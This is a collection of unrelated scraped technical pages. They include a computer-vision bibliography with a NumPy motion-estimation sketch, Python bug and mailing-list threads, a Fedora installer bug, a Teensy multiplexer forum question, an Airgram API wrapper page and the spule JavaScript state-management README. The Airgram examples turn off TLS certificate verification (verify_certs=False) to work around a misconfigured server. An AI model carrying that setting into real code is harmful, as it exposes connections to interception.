// subtask ({A})=>
let ANALYTICS = ({ token }) => [
  {
    sub$: login, // <- stream
    // thunk custom stream dispatch (0)=>
    args: () => ({ token })
  }
]

// task
let task = [
  // no sub$, just pass data
  { args: { href: "" } },
  { sub$: login, args: () => "logging in..." },
  {
    sub$: "AUTH",
    args: ({ href }) => fetch(href).then(r => r.json()),
    erro: (acc, err) => ({ sub$: "cancel", args: err }),
    reso: (acc, res) => ({ token: res })
  },
  acc => ANALYTICS(acc),
  { sub$: login, args: () => "log in success" }
]

Stream Architecture:

run$ is the primary event stream exposed to the user via the ctx object injected into every hdom component. The command stream is the only way the user changes anything in hurl.

Marble Diagram

0>- |------c-----------c--[~a~b~a~]-a----c-> : calls
1>- |ps|---1-----------1----------0-1----1-> : run$
2>- |t0|---------a~~b~~~~~~~~~~~a~|--------> : task$
3>- |t1|---c-----------c------------a----c-> : command$
4>- ---|ps|c-----a--b--c--------a---a----c-> : out$

Userland Handlers:
a>- ---|ta|------*--------------*---*------> : registerCMD
b>- ---|tb|---------*----------------------> : registerCMD
c>- ---|tc|*-----------*-----------------*-> : registerCMD

Streams

0>-: userland stream emissions (run)
1>-: pubsub forking stream (if emission has a sub$)
2>-: pubsub = false? -> task$ stream
3>-: pubsub = true? -> command$ stream
4>-: pubsub emits to registerCMD based on sub$ value

Handlers

work: 4>- is the stream to which the user (and framework) attaches work handlers.
Handlers receive events they subscribe to as topics based on a sub$ key in a Command object.

Built-in Commands/Tasks:

- SET_STATE: Global state update Command
- URL__ROUTE: Routing Task
- "FLIP": F.L.I.P. animation Commands for route/page transitions

run$

User-land event dispatch stream. This stream is directly exposed to users. Any one-off Commands nexted into this stream are sent to the command$ stream. Arrays of Commands (Tasks) are sent to the task$ stream.

Constants Glossary

More Pattern Matching

import { EquivMap } from "@thi.ng/associative"

const haiku = args => {
  const { a, b, c } = args
  const [d] = c || []
  const line =
    new EquivMap([
      [{ a, b }, `${a} are ${b}`],
      [{ a, b, c: [d] }, `But ${a} they don't ${b} ${d}`]
    ]).get(args) || "refrigerator"
  console.log(line)
}

haiku({ a: "haikus", b: "easy" })
//=> haikus are easy
haiku({ a: "sometimes", b: "make", c: ["sense"] })
//=> But sometimes they don't make sense
haiku({ b: "butterfly", f: "cherry", a: "blossom" })
//=> refrigerator

We can use any expression in the context of an Object as a guard. Let's see an example of guarding matches for Objects...
let guarded_matcher = args => {
  let { a, c } = args
  let res =
    // for guards on objects use computed properties
    new EquivMap([
      [{ a, [c > 3 && "c"]: c }, `${c} is greater than 3`],
      [{ a, [c < 3 && "c"]: c }, `${c} is less than 3`]
    ]).get(args) || "no match"
  console.log(res)
}

guarded_matcher({ a: "b", c: 2 }) //=> less than 3
guarded_matcher({ a: "b", c: 3 }) //=> no match
guarded_matcher({ a: "b", c: 4 }) //=> greater than 3

Naming Conventions:

- constants: CAPITAL_SNAKE_CASE - generally accepted convention for constants in JS - used for defining Commands (as though they might cause side effects, their subscription names are constant - i.e., a signal for emphasising this aspect of a Command)
- pure functions: snake_case - some novelty here due to pure functions acting like constants in that with the same input they always return the same output
- impure functions: camelCase - regular side-effecty JS
- Tasks: DOUBLE__UNDERSCORE__SNAKE__CASE - implies the inputs and outputs on either end of a Task - Tasks also should be treated as pure functions where the output is really just data (and lambdas). This is going in the direction of "code as data" - lots'o'examples

Credits

spule is built on the @thi.ng/umbrella ecosystem
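The value-semantic matching shown in the EquivMap examples above has a close analogue in Python, where tuple keys in a plain dict already compare by value. This is a rough sketch of the same route-matching shape (hypothetical, not part of spule), including the in-situ guard trick via an expression that yields a falsy value on failure:

```python
def known(x):
    # guard: returns the value itself on success, None (falsy) otherwise
    return x if x in ("fortunes", "lessons") else None

def match_route(path):
    args = path.split("/") if path else []
    api, idx = (args + [None, None])[:2]
    table = {
        ():                 lambda: "home",
        (known(api), idx):  lambda: f"query {api} #{idx}",
        (known(api),):      lambda: f"query {api} #1",
    }
    # thunks prevent unneeded work, like the (0)=> thunks above
    thunk = table.get(tuple(args), lambda: "404")
    return thunk()

print(match_route(""))             # home
print(match_route("fortunes/88"))  # query fortunes #88
print(match_route("lessons"))      # query lessons #1
print(match_route("bloop/21"))     # 404
```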
https://www.skypack.dev/view/@-0/hdom
I am looking for the cheapest way of automating the conversion of all the text files (tab-delimited) in a folder structure into .xls format, keeping the shape of columns and rows as it is. Currently I am on MacOS; Linux and Windows are available though.

Edit:

import xlwt
import xlrd

f = open('Text.txt', 'r+')
row_list = []
for row in f:
    row_list.append(row.split())
column_list = zip(*row_list)
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet1')
i = 0
for column in column_list:
    for item in range(len(column)):
        worksheet.write(item, i, column[item])
    workbook.save('Excel.xls')
    i += 1

The easiest way would be to just rename all of the files from *.txt to *.xls. Excel will automatically partition the data, keeping the original shape. I'm not going to write your code for you, but here is a head start:

- os.listdir() to list a directory's entries
- os.path.isdir() and os.path.isfile() to see if each 'thing' you just found in your initial directory is a file or a directory, and act accordingly
- os.rename() to rename a file and os.remove() to delete a file
- os.path.splitext() to split a file's name and extension, or just file.endswith('.txt') to work on only the correct files
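Putting those hinted pieces together, the recursive rename might look like this. It's a sketch of the "just rename" approach only (it relies on Excel's text-import behavior rather than producing a true .xls file), demonstrated on a throwaway directory:

```python
import os
import tempfile

def rename_txt_to_xls(root):
    """Walk `root` and rename every *.txt file to *.xls in place."""
    renamed = []
    for name in os.listdir(root):
        path = os.path.join(root, name)
        if os.path.isdir(path):
            renamed += rename_txt_to_xls(path)   # recurse into subdirectories
        elif os.path.isfile(path) and name.endswith('.txt'):
            base, _ext = os.path.splitext(path)
            os.rename(path, base + '.xls')
            renamed.append(base + '.xls')
    return renamed

# demo on a temporary folder structure
root = tempfile.mkdtemp()
os.mkdir(os.path.join(root, 'sub'))
for p in ('a.txt', os.path.join('sub', 'b.txt'), 'keep.csv'):
    open(os.path.join(root, p), 'w').close()

print(sorted(rename_txt_to_xls(root)))
```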
https://codedump.io/share/Ewp0F3Ki5bbQ/1/automate-conversion-txt-to-xls
On Friday 26 November 2004 19:19, Hans Reiser wrote:
> ...

Regarding namespace unification + XPath:

For files, cat /etc/passwd/[. = "joe"] should work like in XPath. But what to do with directories? Would 'cat /etc/[. = "passwd"]' output the contents of the passwd file, or does it mean to output the file '[. = "passwd"]'? If the first is the case, then you have to prohibit filenames looking like '[foo bar]'.

If the shells wouldn't like * for themselves, I'd suggest something like:

cat /etc/*[. = "passwd"]

This means: list all contents and show the ones where the predicate holds, e.g.

/etc/passwd/*[@shell = "/bin/tcsh"]/@shell

I hope I'm not offending, but my impression is now that XPath stuff fits better into some shell providing an XPath view of the filesystem than into the kernel.

--------------------------------------------------------------------

What about mapping the contents of files into "pure" posix namespace? XML is basically a tree, too.

Notes:
1) "...." below is the entry to the reiser4 namespace.
2) # denotes a shell command

For example:

# cd /etc/passwd/
# ls -a
. .. .... joe root
# cd joe
# ls
gid home passwd shell uid
# cat shell
/bin/tcsh
# cd ../....
# ls
plugins

I guess an implementation in reiser4 would require some mime-type/file extension dispatcher plus a special directory plugin for each mime-type.

-- lg, Chris
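The queries being debated are easy to prototype in user space. Here's a Python sketch (hypothetical, just to make the thread's two examples concrete) that parses passwd-format lines, selects a record by name, and projects the shell field with a predicate:

```python
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
joe:x:1000:100:Joe:/home/joe:/bin/tcsh
ann:x:1001:100:Ann:/home/ann:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text):
    return [dict(zip(FIELDS, line.split(":"))) for line in text.splitlines()]

users = parse_passwd(PASSWD)

# cat /etc/passwd/[. = "joe"]  ->  the whole record for joe
joe = next(u for u in users if u["name"] == "joe")

# cat /etc/passwd/*[@shell = "/bin/tcsh"]/@shell  ->  shells matching a predicate
tcsh_shells = [u["shell"] for u in users if u["shell"] == "/bin/tcsh"]

print(joe["home"], tcsh_shells)
```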
http://lkml.org/lkml/2004/11/26/56
What is a namespace?

using namespace std;

As a C++ programmer, one often encounters the above statement, i.e. using namespace std; below the header file declarations in C++ programs. Ever wondered why this statement is used? Well, you would have guessed this statement has something to do with a namespace that has the name std. What is a namespace, by the way? Why do we need namespaces? Here we shall explain all these things.

What is a namespace?

The term namespace refers to the mechanism used for logical grouping of identifiers, i.e. the names of functions, variables etc. A namespace is declared as:

namespace nmsp {
    data-type1 var1;
    data-type2 var2;
    return-type1 func1 () {}
    return-type2 func2 () {}
}

Here, nmsp is the name of the namespace we've defined; var1, var2 are two variables and func1 and func2 are two functions defined inside this namespace. For example, a sample namespace would be like:

namespace maths {
    double x;
    double y;
    double add (double a, double b) {return (a+b);}
    double subtract (double a, double b) {return (a-b);}
    double multiply (double a, double b) {return (a*b);}
    double divide (double a, double b) {return (a/b);}
}

When you include a statement like using namespace std; in your program, you're specifying that the contents of that namespace will be available for use in that program without any prefix. If you don't include this statement in your program, the identifiers that require this namespace will have to be accompanied by the prefix std::. Similarly, for other namespaces, the required prefix would be <namespace-name>::. In other words, a namespace named wcb requires its identifiers to have the prefix wcb:: (in case using namespace wcb; hasn't been used in the program). See the following two examples to understand this.

Example 1 – Without "using namespace std;"

#include <iostream>
int main() {
    cout << "Hello World";
    return 0;
}

The above example wouldn't work. Why?
cout is a part of the std namespace and you haven't included std in your program. You would have to replace cout with std::cout in order to make your program work.

Example 2 – With "using namespace std;"

#include <iostream>
using namespace std;
int main() {
    cout << "Hello World";
    return 0;
}

The above program would work properly because you have included the required namespace.

Why do we use namespaces?

This is the most important question concerning namespaces. Why exactly do we need namespaces? There are mainly two reasons you might want to use namespaces.

- First, namespaces can be used to group identifiers. Therefore, they can be used to group similar functions, say, user input functions in one namespace and output-showing functions in another. For example, functions like getdata(), getval(), getinput() etc. can be put in a namespace named userinput. Similarly, functions like showdata(), putval(), output() etc. can be put in a namespace named output.
- Second, they are used to prevent conflicts. If you're using multiple libraries in your program, you might have to face name conflicts, i.e. two or more identifiers having the same name. For example, suppose you have employed two libraries Add.lib and Subtract.lib in your program. Now, you face a problem. Both libraries have a function named Calculate(). Add.lib uses this function to add two numbers, while Subtract.lib uses it to subtract the smaller number from the greater number. Now suppose you make a function call to Calculate(). Which function will be called – the one from Add.lib or the one from Subtract.lib? To get rid of this ambiguity, we use namespaces in our programs.

How to use namespaces in a C++ program?

We have described namespaces and the reasons one should use them. But how do we use namespaces properly in our programs? It is quite simple. There are two ways to use the using… statement in your program.

- The first way is to include the entire namespace.
This is done by writing using namespace <namespace-name>;, e.g. using namespace std;, using namespace wcb;, etc. In this case, you have included the entire namespace, so you can write all the identifiers of that namespace without using the <namespace-name>:: prefix.

- The second way is to include only the identifiers you need.

This is done by writing using <namespace-name>::identifier-name;, e.g. using std::cout;, using std::cin;, etc. In this case, you have included only individual identifiers from a namespace, so you have to use the <namespace-name>:: prefix with all other identifiers.

Many programmers recommend that you avoid the use of using… statements. They say you should always write the full name of an identifier, such as std::cout. In my personal opinion, it is appropriate to use using namespace <namespace-name>;, especially for long programs. The reason is obvious: writing using namespace … statements makes it easier to focus on the actual coding process rather than having to remember all the namespaces and the identifiers they contain.

We hope you liked reading this article. If you did, please let us know. 🙂
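The same two import styles exist almost verbatim in other languages, which can make the trade-off easier to see. In Python, for instance, modules play a role similar to namespaces (an analogy only, not C++):

```python
# Qualified access: like writing std::cout everywhere.
import math
area = math.pi * 2 ** 2

# Selective import: like `using std::cout;` -- only one name is pulled in.
from math import sqrt
side = sqrt(16)

# Wildcard import: like `using namespace std;` -- every public name is
# pulled in, which is convenient but invites name collisions.
from math import *
total = floor(area) + side

print(area, side, total)
```

The same caution applies: the wildcard form is handy in short programs, but in larger codebases the qualified or selective forms make it obvious where each identifier comes from.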
https://www.wincodebits.in/2015/09/what-is-a-namespace.html
I'm trying to make an IList of the type Vector2. Why doesn't this work..?

IList<Vector2> borderPixels;

Do I have to import something?

Are you trying to make a List(T)? That's under the System.Collections.Generic namespace.

Answer by willparsons · Sep 09, 2015 at 08:18 AM

Add using System.Collections.Generic; at the top of your script and change the datatype from IList to just List:

List<Vector2> borderPixels = new List<Vector2>();

That should do the trick.

Answer by FortisVenaliter · Sep 08, 2015 at 07:52 PM

Because IList is an interface, not a class. Look up the interface keyword and abstraction/inheritance for more information, but you can never instantiate an abstract class or interface. You're probably looking for the List class instead.

Right. So you can have your variable be declared as IList<Vector2>, but you need an actual class instance. So you can do this:

IList<Vector2> borderPixels = new List<Vector2>();

The List<T> class implements the IList<T> interface, so you can assign a List<T> instance to an IList<T> variable. However, you could use any other class that implements the IList<T> interface. Using the IList interface usually only makes sense if you write some framework/abstraction yourself where your class doesn't need to know the actual implementation; it just needs "some kind" of "list". In most cases you would use the type List<T> directly:

List<Vector2> borderPixels = new List<Vector2>();
https://answers.unity.com/questions/1063765/how-to-make-an-ilist-of-a-certain-type.html
MVC

In this lab, you will learn about the Model-View-Controller (MVC) pattern as it is implemented by AngularJS.

Part 1 – Setting Up The Environment

Copy the mvc.html file over to the C:\Software\nginx\html\labs\ directory. Open the Command Prompt window and, unless you are already in the C:\Software\nginx directory, type in the following command at the prompt and press ENTER:

cd C:\Software\nginx

Start the nginx web server by executing the following command:

start nginx

This command will launch the nginx web server, which starts listening on port 80, ready to service your browser requests. Keep the Command Prompt window open.

Part 2 – Understanding MVC Components

Open the Google Chrome browser and navigate to the lab page. Enter Bill Smith in the Enter person's name input box and 30000 for the person's income and click the Apply Tax button. You will be presented with a pop-up message dialog. As you can see, Bill Smith just lost 50% of his disposable income. Click OK in the pop-up message dialog. Let's take a look at how AngularJS (not the Revenue Service, of course!) did that to Bill Smith.

Open the C:\Software\nginx\html\labs\mvc.html file in your text editor. You should see the following content (the controller body shown here reflects the logic described in Part 3):

<!doctype html>
<html>
<head>
<title>MVC with AngularJS</title>
<script src="/js/angular.js"></script>
<script>
  function TaxCalculator($scope) {
    $scope.applyTax = function() {
      var person = $scope.person.name;
      var income = $scope.person.income;
      var taxRate = 0.5;
      var tax = income * taxRate;
      alert("A tax of $" + tax + " was withheld from " + person);
    };
  }
</script>
</head>
<body ng-app ng-controller="TaxCalculator">
  Enter person's name : <input type="text" ng-model="person.name">
  <br>
  Enter person's income: <input type="number" ng-model="person.income">
  <p style="color: blue;">The income of [{{person.name}}] is $[{{person.income}}]</p>
  <button ng-click="applyTax()">Apply Tax</button>
</body>
</html>

Let's review the elements of the MVC pattern on the page. The model is presented by two JavaScript properties, person.name and person.income, that are plugged into the framework by the ng-model attributes of the input HTML elements.
For the person.income numeric value we use the number input element of HTML5, which helps with input filtering (any user input other than a number will be discarded). Note that we are using the dot '.' notation to group properties (name and income) into a single "namespace" called person. This idiom helps build object.property hierarchies.

The UI (View) of the page is represented by the DOM (the input HTML elements); the UI elements are mapped to the person.name and person.income JavaScript properties. The up-to-date state of our model is echoed back to the user in the p element.

We are creating a controller called TaxCalculator. It will be the controller part of the MVC structure on our page. The controller contains the business logic of calculating and applying the tax (of the whopping 50%). The $scope parameter of the TaxCalculator constructor function is the context object passed in (or injected) by AngularJS. The $scope carries the model values updated in the View. The applyTax function represents the operation attached to our controller, and it's bound to the UI by way of the ng-click directive of the Apply Tax button.

So, in essence, the MVC pattern is implemented in our AngularJS-driven page as follows: the View is the Document Object Model (DOM), the Controller is a JavaScript class, and the Model is the data stored in JavaScript variables or object properties. Keep the file open in the text editor, as we are going to make changes to our AngularJS MVC application.

Part 3 – Working with the MVC Components

Currently, our MVC application has the tax rate hard-coded and set to 50% (taxRate = 0.5;). Let's improve on this and make our application more flexible by exposing the tax rate to the user through the UI. In your text editor that holds the mvc.html file, locate the Enter person's income: <input type="number" . . .
line and right below it enter the following statement in one line:

The income tax rate (%): <input type="number" ng-model="tax.rate" min="0" max="100">

As a result, you should have the following updated content in this part of our web page:

(content skipped for space ...)
<br>
Enter person's income: <input type="number" ng-model="person.income">
<br>
The income tax rate (%): <input type="number" ng-model="tax.rate" min="0" max="100">
<p style="color: blue;">The income of [{{person.name}}] is $[{{person.income}}]</p>
(content skipped for space ...)

In the mvc.html file, locate the taxRate = 0.5; line and replace it with this content:

var taxRate = $scope.tax.rate/100;

As a result, you should have the following updated content in this part of our web page:

(content skipped for space ...)
$scope.applyTax = function() {
    var person = $scope.person.name;
    var income = $scope.person.income;
    var taxRate = $scope.tax.rate/100;
    var tax = income * taxRate;
(content skipped for space ...)

Save the file. Keep the file open in the text editor. Switch to Chrome and refresh the browser view by pressing Ctrl-R. You should see the updated page content. Now you have the income tax rate control that adds flexibility to our application. Try out applying different income tax rates (the supported rates are 0% through 100%).

Note: If you have a problem applying taxes (you don't see a pop-up dialog stating how much tax was withheld from the taxpayer), press Ctrl-Shift-J in Chrome to open the JavaScript console and see the exception (error) that prevented the controller's applyTax operation from completing. This error is typically the result of entering a rate value that is in conflict with the defined number input range (input beyond the [0 – 100] range, e.g. a negative value). You can click any of the links in the console output to drill down and inspect what is happening under the hood. In our labs, we use angular.js at source level (not minimized for production), so you can get some insights into the workings of this framework.
To hide the JavaScript console in Chrome, press Ctrl-Shift-J again.

Part 4 – Cleaning Up

Close the Chrome browser.

In this tutorial, you learned about the Model-View-Controller (MVC) pattern as it is implemented by AngularJS.

MVC With AngularJS was last modified: November 21st, 2017 by admin
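To recap the controller logic in plain JavaScript, here is a minimal sketch that simulates the $scope object AngularJS would inject (the simulated scope values below are my own example data; in the real page, ng-model keeps $scope in sync with the inputs):

```javascript
// Minimal simulation of the TaxCalculator controller outside AngularJS.
// In the real page, AngularJS injects $scope and binds it to the inputs.
function TaxCalculator($scope) {
  $scope.applyTax = function () {
    var income = $scope.person.income;
    var taxRate = $scope.tax.rate / 100; // rate entered through the UI
    var tax = income * taxRate;
    return tax;
  };
}

// Simulate what the View would have populated via ng-model:
var scope = { person: { name: 'John', income: 1000 }, tax: { rate: 50 } };
TaxCalculator(scope);
console.log(scope.applyTax()); // 500
```

The point of the exercise: the controller never touches the DOM; it only reads and writes $scope, which is exactly why Angular can keep View and Model in sync for you.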
https://www.webagesolutions.com/knowledgebase/kb006/kb006-mvc-with-angularjs/
CC-MAIN-2018-22
refinedweb
1,030
65.52
pthread_attr_setstackprealloc()

Set the amount of memory to preallocate for a thread's MAP_LAZY stack

Synopsis:

#include <pthread.h>

int pthread_attr_setstackprealloc(
        const pthread_attr_t * attr,
        size_t stacksize);

Since: BlackBerry 10.0.0

Arguments:

- attr - A pointer to the pthread_attr_t structure that defines the attributes to use when creating new threads. For more information, see pthread_attr_init().
- stacksize - The amount of stack you want to preallocate for new threads.

Library: libc

Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:

The pthread_attr_setstackprealloc() function sets the size of the memory to preallocate for a thread's MAP_LAZY stack. By default, the system allocates sysconf(_SC_PAGESIZE) bytes of physical memory for the initial stack reference. This function allows you to change this default memory size if you know that a thread will need more stack space. Semantically, there is no difference in operation, but the memory manager attempts to make more efficient use of Memory Management Unit hardware (e.g. a larger page size in the page table entry) for the stack if it knows upfront that more memory will be required.

Returns:

- EOK - Success.

Classification:

Last modified: 2014-06-24
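As a usage sketch: pthread_attr_setstackprealloc() exists only on QNX/BlackBerry, so the call below is guarded by a platform macro and becomes a no-op elsewhere, and the 64-page preallocation figure is an arbitrary example of my own.

```c
#include <pthread.h>
#include <stddef.h>

static void *worker(void *arg)
{
    return arg;  /* placeholder for real work needing a deep stack */
}

/* Create and join a thread whose lazily-mapped stack gets `prealloc`
   bytes of physical memory reserved up front (QNX/BlackBerry only). */
int start_worker(size_t prealloc)
{
    pthread_attr_t attr;
    pthread_t tid;

    if (pthread_attr_init(&attr) != 0)
        return -1;
#ifdef __QNXNTO__
    /* The call described on this page; pass a multiple of the page size. */
    pthread_attr_setstackprealloc(&attr, prealloc);
#else
    (void)prealloc;  /* illustration only on non-QNX systems */
#endif
    if (pthread_create(&tid, &attr, worker, NULL) != 0)
        return -1;
    pthread_join(tid, NULL);
    pthread_attr_destroy(&attr);
    return 0;
}
```

Everything else in the snippet (attribute init/destroy, create/join) is standard POSIX, which is why the guarded version still compiles and runs on other platforms.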
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/p/pthread_attr_setstackprealloc.html
I have two tables I would like to join together. One of them has a very bad skew of data. This is causing my Spark job to not run in parallel, as a majority of the work is done on one partition. I have heard about, read about, and tried to implement salting my keys to increase the distribution. The approach demonstrated at 12:45 (in the video I linked) is exactly what I would like to do. Any help or tips would be appreciated. Thanks!

Yes, you should use salted keys on the larger table (via randomization) and then replicate the smaller one / cartesian join it to the new salted one. Here are a couple of suggestions:

- Tresata skew join
- RDD python skew join

The Tresata library looks like this:

import com.tresata.spark.skewjoin.Dsl._ // for the implicits

// skewjoin() method pulled in by the implicits
rdd1.skewJoin(rdd2, defaultPartitioner(rdd1, rdd2),
  DefaultSkewReplication(1)).sortByKey(true).collect.toList
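To make the salting idea concrete without a Spark cluster, here is a pure-Python sketch (the function names and the salt count are my own; Spark's skewJoin performs the equivalent across partitions). Keys on the large side get a random salt suffix, and every row of the small side is replicated once per salt so each salted key still finds its match:

```python
import random
from collections import defaultdict

def salt_large(rows, n_salts):
    """Attach a random salt to each key of the skewed (large) side."""
    return [((k, random.randrange(n_salts)), v) for k, v in rows]

def replicate_small(rows, n_salts):
    """Replicate each small-side row once per salt value so joins still match."""
    return [((k, s), v) for k, v in rows for s in range(n_salts)]

def join(left, right):
    """Plain hash join on the (key, salt) pairs."""
    table = defaultdict(list)
    for k, v in right:
        table[k].append(v)
    return [(k, (lv, rv)) for k, lv in left for rv in table[k]]
```

Because the salted keys now spread a single hot key over n_salts partitions, no one partition carries all of the skewed key's rows.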
https://codedump.io/share/n2c6sniQju0M/1/apache-spark-handling-skewed-data
Hi Andrea,

Sorry for the inconvenience caused. We have analyzed the reported issue (when unobtrusive support is turned off, the DatePickerFor renders as a simple textbox and not as the DatePicker) and we are not able to reproduce it. We have prepared a simple sample based on your requirement. You can also download the attached sample from the following location.

In the above sample, we have used the DatePickerFor with the form. When we submit the form, the selected date value is sent in the postback. The submitted date value is displayed in the view page. We have also tried this with the grid sample. In this sample also we cannot reproduce the above reported issue. Both the controls are working fine.

If you still face any problems, please send us back the attached sample with the replication procedure, so that we can provide the exact solution at the earliest. Please let us know if you have any queries.

Regards,
Kaliswaran S

public class Incident
{
    public Incident()
    {
        TempContainer = new Container();
    }

    DateTime dt = DateTime.Now;
    public DateTime datepicker1 { get; set; }
    public Container TempContainer { get; set; }
}

public class Container
{
    public DateTime TempDate { get; set; }

    public Container()
    {
        TempDate = DateTime.Now.AddMonths(2);
    }
}

<div class="datepickerDiv">
    @Html.EJ().DatePickerFor(model => model.datepicker1, (Syncfusion.JavaScript.Models.DatePickerProperties)ViewData["date"])
</div>
<div class="datepickerDiv">
    @Html.EJ().DatePickerFor(model => model.TempContainer.TempDate, (Syncfusion.JavaScript.Models.DatePickerProperties)ViewData["date"])
</div>

Hi Andrea,

Sorry about the inconvenience caused. We are able to reproduce the reported issue (when two DatePickerFor helpers are used on the same page with different properties, the first DatePicker renders correctly but the second is a simple textbox). We have confirmed this as a defect, and an issue report has been logged for it.
The fix for this issue will be available in our upcoming service pack release for ASP.NET MVC, which is expected to be rolled out at the end of this month (January 2015). We will notify you once our service pack release is rolled out. If you are in need of a solution sooner, please let us know, so that we can provide a patch for this issue before the service pack release. Please let us know if you have any queries.

Regards,
Kaliswaran S

Hi Andrea,

Thanks for your update.

Query: I just noticed that the DatePickerFor problem appears even on the DropDownListFor. Maybe it is a more general problem that happens with other MVC helpers.

We have already validated the above reported issue for all "form" controls, not only for "DatePickerFor", and we will deliver the fix for all "form" controls. Please let us know if you have any queries.

Regards,
Kaliswaran S
https://www.syncfusion.com/forums/117907/datepickerfor
a question in fixing this code

alex lotel, Ranch Hand, Posts: 191

posted 8 years ago

I noticed that A doesn't implement C: it doesn't have a print method. I tried to fix it by adding

public class A extends B implements C

but it says that there is a bug in the super constructor. I can't understand what the bug is.

public class A implements C {
    int d = 17;

    A(int d) {
        this.d = d;
    }

    A done() {
        System.out.println("I am done");
        return this;
    }
}

public class B extends A {
    int a = 1;
    int b = 2;

    public B(int a, int b) {
        this(a);
        a = b;
    }

    public B(int b) {
        super(b);
        a = b;
    }

    public A done() {
        System.out.println("finished");
        return this;
    }

    public void print(int a, int b, int c) {
        System.out.println("a=" + a);
        System.out.println("b=" + b);
        System.out.println("c=" + c);
    }
}

public interface C {
    public void print(int a, int b, int c);
}

public class MainClass {
    public static void main(String[] args) {
        B b = new B(7, 11);
        b.print(b.a, b.b, b.d);
        A a = ((A) b).done();
    }
}

alex lotel, Ranch Hand, Posts: 191

posted 8 years ago

I was told that another way is to declare class A abstract, but I can't understand what that means, because an abstract class is like an interface except that it may also include finished method bodies, not just the signatures like an interface?

S Reddy, Ranch Hand, Posts: 45

posted.
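One way to resolve the thread's question, as an illustrative sketch rather than the poster's exact files: declare A abstract (the "other way" mentioned in the thread), since A claims to implement C without supplying a print body. The classes are made non-public here so they can live in a single file, and the parameter-shadowing bug in B(int, int) is fixed by assigning the field explicitly:

```java
interface C {
    void print(int a, int b, int c);
}

// A has no print() body of its own, so it must be abstract;
// the concrete subclass B supplies the implementation.
abstract class A implements C {
    int d = 17;

    A(int d) { this.d = d; }

    A done() {
        System.out.println("I am done");
        return this;
    }
}

class B extends A {
    int a = 1;
    int b = 2;

    B(int a, int b) {
        this(a);        // delegates to B(int), which calls super(a)
        this.a = b;     // assign the field, not the parameter
    }

    B(int b) {
        super(b);
        a = b;
    }

    @Override
    public A done() {
        System.out.println("finished");
        return this;
    }

    @Override
    public void print(int a, int b, int c) {
        System.out.println("a=" + a);
        System.out.println("b=" + b);
        System.out.println("c=" + c);
    }
}
```

With this version, new B(7, 11) runs the chain B(int,int) -> B(int) -> A(int), so d ends up as 7 and the field a as 11, and the compile error about A not implementing C disappears.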
http://www.coderanch.com/t/409483/java/java/fixing-code
ADO.NET 2.0 support

The ADO.NET driver has been updated to support version 2.0 of the .NET framework. Several new classes and methods have been added as part of this support. See iAnywhere.Data.SQLAnywhere namespace (.NET 2.0).

SQL Anywhere Explorer

The SQL Anywhere Explorer lets you connect to SQL Anywhere databases from within Visual Studio .NET. In addition, you can open Sybase Central and Interactive SQL directly from Visual Studio .NET. See Working with database connections in Visual Studio.

iAnywhere JDBC driver supports JDBC 3.0

The iAnywhere JDBC driver now supports JDBC 3.0 calls. The iAnywhere JDBC driver no longer supports JDBC 2.0. Both the ianywhere.ml.jdbcodbc.IDriver and ianywhere.ml.jdbcodbc.jdbc3.IDriver classes are still supported to allow existing applications to continue running without modification, but both drivers are now identical and implement JDBC 3.0 only. You can no longer use JRE versions earlier than 1.4 with the iAnywhere JDBC driver. See Introduction to JDBC.

iAnywhere JDBC driver supports the SQL Server Native Client ODBC driver

The iAnywhere JDBC driver now checks if the ODBC driver is the Microsoft SQL Server Native Client ODBC driver and appropriately sets the default result set type and other attributes.

Support for PreparedStatement.addBatch method

The iAnywhere JDBC driver now supports the PreparedStatement.addBatch method. This method is useful for performing batched (or wide) inserts.

Support for SQL_GUID added to ODBC driver

Support for UNIQUEIDENTIFIER columns has now been added to the SQL Anywhere ODBC driver. A UNIQUEIDENTIFIER column can now be typed as SQL_GUID.

Support for GUID escape sequences added to ODBC driver

Support for GUID escape sequences has been added to the SQL Anywhere ODBC driver. GUID escape sequences may be used in SQL statements prepared and executed through ODBC. A GUID escape sequence has the form {guid 'nnnnnnnn-nnnn-nnnn-nnnn-nnnnnnnnnnnn'}.
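The GUID escape syntax can be illustrated with a small helper (Python, my own code for illustration; the table and column names in the comment are hypothetical, not from SQL Anywhere):

```python
import uuid

def guid_escape(g):
    # Produce the ODBC GUID escape sequence, e.g. for embedding in a
    # prepared statement such as:
    #   SELECT * FROM orders WHERE order_uuid = {guid '...'}
    # uuid.UUID() validates and normalizes the textual GUID form.
    return "{guid '%s'}" % uuid.UUID(str(g))
```

The driver manager translates such escape sequences into the backend's native GUID literal form, so the same statement text stays portable across ODBC drivers that support the escape.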
ODBC message callbacks are now per-connection

ODBC has supported message callbacks since Adaptive Server Anywhere version 9.0.0, but messages for all connections came to a single callback function. As of version 9.0.2, when you designate a message callback function, it applies only to a single connection. This is consistent with how DBLIB works. All messages now funnel through a single function in the ODBC driver, which filters the messages by connection, and only calls the connection's callback function for those connections that have one.

New functions added to the SQL Anywhere PHP module

The following new functions have been added to the SQL Anywhere PHP module. In addition, two new options have been added to the sqlanywhere_set_option function: verbose_errors and row_counts. See SQL Anywhere PHP API reference.

Enhancements to db_locate_servers_ex function

The db_locate_servers_ex function supports two new flags: DB_LOOKUP_FLAG_ADDRESS_INCLUDES_PORT, which returns the TCP/IP port number in the a_server_address structure passed to the callback function, and DB_LOOKUP_FLAG_DATABASES, which indicates that the callback function is called once for each database or database server that is found. See db_locate_servers_ex function.

Perl DBD::ASAny driver for the Perl DBI module renamed

The Perl driver has been renamed from DBD::ASAny to DBD::SQLAnywhere. Perl scripts that use SQL Anywhere must be changed to use the new driver name. The cursor attribute ASATYPE, which returns native SQL Anywhere types, has not changed, and neither have the type names (ASA_STRING, ASA_FIXCHAR, ASA_LONGVARCHAR, and so on). See SQL Anywhere Perl DBD::SQLAnywhere DBI module.

SQL preprocessor (sqlpp) -o option values

The sqlpp -o option now accepts WINDOWS rather than WINNT for Microsoft Windows. As well, you can specify UNIX64 for supported 64-bit Unix operating systems. See SQL preprocessor.
ODBC driver manager enhancements

The ODBC Driver Manager now supports: all ODBC 3.x calls, wide CHAR entry points, and tracing of connections. In addition, the ODBC Driver Manager is now able to switch between a non-threaded or threaded SQL Anywhere driver.

ODBC Driver Manager can now be used by both threaded and non-threaded applications

The ODBC Driver Manager can now be used by both threaded and non-threaded applications.

Deployment wizard

